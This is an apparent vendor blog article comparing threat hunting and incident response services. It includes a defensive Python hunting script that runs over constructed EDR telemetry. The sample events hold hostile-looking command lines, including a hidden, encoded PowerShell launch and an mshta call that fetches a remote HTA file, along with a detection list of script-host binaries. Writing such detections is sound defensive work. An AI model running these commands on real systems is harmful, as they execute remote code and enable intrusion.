Threat Hunting & Incident Response: Two complementary and necessary services
35 million dollars. This is the amount of losses caused by a cyber-attack on Halliburton, a multinational energy company, in August. Although the figure is shocking, the consequences of the incident could have been more serious if the victim had been a company with fewer resources and a lower level of cybersecurity maturity.
Incidents such as this one show that advanced cybersecurity services such as Threat Hunting and Incident Response are essential when it comes to detecting cyber threats, being proactive in their eradication and acting with maximum efficiency from the first second of a security incident.
1. What is Threat Hunting?
To approach the comparison between Threat Hunting and Incident Response we must understand what each of these services consists of. Threat Hunters are in charge of:
- Performing an active and continuous search for threats based on compromise hypotheses.
- Detecting tactics, techniques and procedures (TTPs) of hostile actors that have not triggered alerts in a company’s detection mechanisms.
- Identifying new TTPs.
- Analyzing the telemetry available through EDR/XDR technology in order to detect whether malicious activity has occurred in the context of the enterprise.
- Providing highly relevant information to the Red Team so that its exercises are as realistic as possible.
Thus, Threat Hunting services enable companies to detect threats early and discover malicious operations, even if the technology is not capable of doing so.
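As an added illustration of what a hypothesis-driven hunt over EDR telemetry looks like in practice (this is example code written for this page, not a tool or method of the article's author), the script below sweeps a constructed process-creation export for one hypothesis: a user-facing document application spawning a script host, a pattern that often never raises an alert on its own. The JSON field names (ts, host, user, parent_image, image, cmdline) and the sample events are assumptions made up for the example, not any vendor's schema or real data.

```python
"""Hypothesis-driven hunt over constructed EDR process-creation telemetry.

Hypothesis (assumed for this example): an intruder whose activity produced no
alert is launching script interpreters from document applications. Instead of
waiting for an alert, we sweep the telemetry for that parent/child pattern.
"""
import json
from collections import Counter

# Constructed sample export: one JSON object per process-creation event.
# Field names are an assumption for the example, not a specific EDR schema.
SAMPLE_TELEMETRY = r"""
{"ts": "2024-08-21T08:01:12Z", "host": "WS-0142", "user": "alice", "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Program Files\\Microsoft Office\\WINWORD.EXE", "cmdline": "WINWORD.EXE invoice.docx"}
{"ts": "2024-08-21T08:01:40Z", "host": "WS-0142", "user": "alice", "parent_image": "C:\\Program Files\\Microsoft Office\\WINWORD.EXE", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe -w hidden -enc SQBFAFgA"}
{"ts": "2024-08-21T08:02:05Z", "host": "WS-0142", "user": "alice", "parent_image": "C:\\Program Files\\Microsoft Office\\WINWORD.EXE", "image": "C:\\Windows\\splwow64.exe", "cmdline": "splwow64.exe 12288"}
{"ts": "2024-08-21T09:15:33Z", "host": "WS-0233", "user": "bob", "parent_image": "C:\\Program Files\\Microsoft Office\\EXCEL.EXE", "image": "C:\\Windows\\System32\\mshta.exe", "cmdline": "mshta.exe https://example.invalid/update.hta"}
{"ts": "2024-08-21T09:20:00Z", "host": "SRV-0007", "user": "svc_build", "parent_image": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe -File build.ps1"}
{"ts": "2024-08-21T10:02:11Z", "host": "WS-0142", "user": "alice", "parent_image": "C:\\Program Files\\Microsoft Office\\OUTLOOK.EXE", "image": "C:\\Program Files\\Microsoft Office\\WINWORD.EXE", "cmdline": "WINWORD.EXE /n"}
"""

# User-facing document applications covered by the hypothesis.
DOCUMENT_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
# Script hosts and living-off-the-land binaries a document app should not launch.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def load_events(jsonl):
    """Parse a JSON-lines export into a list of event dicts, skipping blanks."""
    return [json.loads(line) for line in jsonl.strip().splitlines() if line.strip()]


def hunt_document_app_to_script_host(events):
    """Return the events matching the hypothesis, each with supporting indicators."""
    findings = []
    for ev in events:
        parent, child = basename(ev["parent_image"]), basename(ev["image"])
        if parent not in DOCUMENT_APPS or child not in SCRIPT_HOSTS:
            continue
        cmd = ev.get("cmdline", "").lower()
        indicators = []  # context that helps the hunter triage, not a verdict
        if "-enc" in cmd or "-encodedcommand" in cmd:
            indicators.append("encoded command")
        if "-w hidden" in cmd or "windowstyle hidden" in cmd:
            indicators.append("hidden window")
        if "http://" in cmd or "https://" in cmd:
            indicators.append("remote URL in command line")
        findings.append({"ts": ev["ts"], "host": ev["host"], "user": ev["user"],
                         "parent": parent, "child": child, "indicators": indicators})
    return findings


def summarize_by_host(findings):
    """Count findings per host so scoping can start with the busiest machines."""
    return Counter(f["host"] for f in findings)


if __name__ == "__main__":
    hits = hunt_document_app_to_script_host(load_events(SAMPLE_TELEMETRY))
    for hit in hits:
        print(f"{hit['ts']} {hit['host']} {hit['user']}: {hit['parent']} -> {hit['child']} {hit['indicators']}")
    print("hosts to scope:", dict(summarize_by_host(hits)))
```

Of the six constructed events, only two match: the Word-to-PowerShell launch with an encoded, hidden command and the Excel-to-mshta launch fetching a remote HTA. The build server's cmd-to-PowerShell event and Outlook opening Word are deliberately included as benign noise that the hypothesis must not flag; a hunt that fires on those would bury the hunter in false positives.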
2. What is Incident Response?
Incident response services have a twofold mission:
- To prepare companies to deal with a cyber-attack.
- To respond as quickly and efficiently as possible to a security incident.
To meet these objectives, Incident Response professionals must carry out the following before a cyber-attack occurs:
- Periodic Readiness Assessment to enable them to respond to a cyber-attack in less than 1 hour.
- Ongoing Compromise Assessment to identify previously undetected malicious activity.
- Incident drills, in order to optimize how to respond to incidents.
- Threat analysis to identify hostile actors that could launch cyber-attacks against the company and implement measures to help prevent them.
What happens when a security incident is in progress? Incident Response services are responsible for the following:
- Understanding the full scope of the security incident.
- Investigating the incident and identifying the scope and impact of the compromise. This involves understanding the permissions available to hostile actors and elucidating their ability to harm the enterprise.
- Orchestrating a tailored response to the incident and successfully expelling the malicious actor from the corporate infrastructure.
- Ensuring that the hostile actor cannot re-engage the enterprise.
- Analyzing the incident and the response to it in order to know precisely what happened, identify the weaknesses exploited by the malicious actors and propose a series of recommendations to prevent future incidents.
Thus, the comparison between Threat Hunting and Incident Response allows us to see that they are not mutually exclusive services; on the contrary, they complement each other and contribute to improving companies’ incident detection and response capabilities.
3. The importance of proactivity and continuity in Threat Hunting and Incident Response
Beyond the differences between Threat Hunting and Incident Response that we have just listed, both services must have two common characteristics that are critical to guarantee their effectiveness:
- Proactivity. If Threat Hunting and Incident Response services are not proactive in detecting malicious activity and criminal operations, their effectiveness suffers. Conversely, a proactive Threat Hunting service can detect threats at very early stages and prevent the malicious actor from ever producing a significant incident. In the same way, if a company chooses to implement a proactive Incident Response service, it will be able to take measures to be prepared for a security incident and respond efficiently from the very first moment, thus minimizing any impact.
- Continuity. Some companies do not have Threat Hunting and Incident Response services that work on a continuous basis but opt for:
  - Campaign-based Threat Hunting with limited frequency, scope and adaptability.
  - A reactive Incident Response, i.e., one that only starts working when an incident is detected and does not make any prior preparation, which reduces the ability to respond quickly and effectively.
Only through continuous Threat Hunting and Incident Response services can threat detection and incident response be optimized to the maximum.
4. Threat Hunting & Incident Response: Who should respond to a detected threat?
Given what we have just said, it is clear that rather than talking about Threat Hunting or Incident Response, we should point out the importance of both services being provided collaboratively. Why?
- The knowledge and experience of Threat Hunters is essential when performing key tasks of proactive Incident Response, focusing on preparedness and prevention:
  - Compromise Assessment.
  - Threat Analysis.
- As we have already mentioned, Threat Hunters are capable of analyzing the information provided by telemetry and detecting threats at very early stages. This results in the ability to resolve an incident in a short time and ensure that its impact on the operation of a company is very limited.
- There is a debate among cybersecurity professionals themselves as to who should be in charge of:
  - The response to a threat detected by Threat Hunters.
  - Identifying the scope of a compromise.
  - Designing containment and remediation strategies and plans.
That this doubt exists is evidence that the collaboration between Threat Hunting and Incident Response teams should be as close as possible to optimize the way they operate and increase a company’s detection and response capacity.
5. Five benefits of implementing Threat Hunting and Incident Response
The comparison between Threat Hunting and Incident Response helps us to see five major benefits that are very attractive for companies that implement both services:
- Earlier threat detection and effective threat neutralization, even before a significant incident occurs.
- Increased coverage of malicious tactics, techniques and procedures and continuous research into new TTPs.
- Increased ability to contain the impact and reduce the duration of a security incident.
- Protection of business continuity in the event of an incident and minimized damage to customers, suppliers or employees.
- A reduced economic impact from a successful cyber-attack. Thanks to Threat Hunting and Incident Response services, the effect of a cyber-attack on a company’s operations can be mitigated, and it is not necessary to invest a large amount of resources to manage an incident from scratch.
If you would like more information on how to prepare your company for security threats, please contact us and we will advise you without obligation.